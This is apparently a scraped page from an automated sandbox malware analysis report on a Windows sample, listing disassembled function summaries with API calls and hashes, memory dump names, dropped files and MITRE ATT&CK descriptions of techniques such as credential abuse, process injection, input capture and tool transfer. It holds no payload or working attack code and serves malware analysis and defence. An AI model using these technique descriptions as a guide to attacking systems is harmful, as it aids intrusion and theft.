Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: getpeernameinet_ntoa
String ID: <unavailable>
API String ID: 1982201544-1096956887
Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
Instruction ID: a683c0b7f244e2cb9d48a99c04c5d555355ff78dc4a82b7392530e82bc7bde72
Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
Instruction Fuzzy Hash: A1F01271A187818BEA64AB10E85116DB760FFC8B98FC01436E94D17724DF3CD106CB10

Function 00007FF7D59A1740 Relevance: 5.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59A36C0: malloc.LIBCMT ref: 00007FF7D59A36CB

free.LIBCMT ref: 00007FF7D59A1777

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

free.LIBCMT ref: 00007FF7D59A17A0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnomalloc
String ID:
API String ID: 1225357528-0
Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
Instruction ID: 39a5b80d30b31ce7259457ebe149c5aab999d5212184af6fc5832fe17278ab20
Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
Instruction Fuzzy Hash: 2D111A11F1C18243EA54B766A75137E9251AF84FC8FC85032EE9E4BB8BDF2CD4828764

Function 00007FF7D59C7A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7D59C7AE5
GetLastError.KERNEL32 ref: 00007FF7D59C7AEF
CloseHandle.KERNEL32 ref: 00007FF7D59C7B17
GetLastError.KERNEL32 ref: 00007FF7D59C7B21

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
Instruction ID: 1094eaa0f00a6b17c9b0c261708e9e3ac6b67994d0743934e860c592f281380c
Opcode Fuzzy Hash: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
Instruction Fuzzy Hash: DD210632A19A5A87EB54AF65D48067DA3A4FF84F48FD40036EE4E436A8DF3CD445C760

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Olz7TmvkEW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\14cf2fb7-1d03-414b-af9d-4a37820eee6a.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223122917Z-195.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Windows Analysis Report
Olz7TmvkEW.exe

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre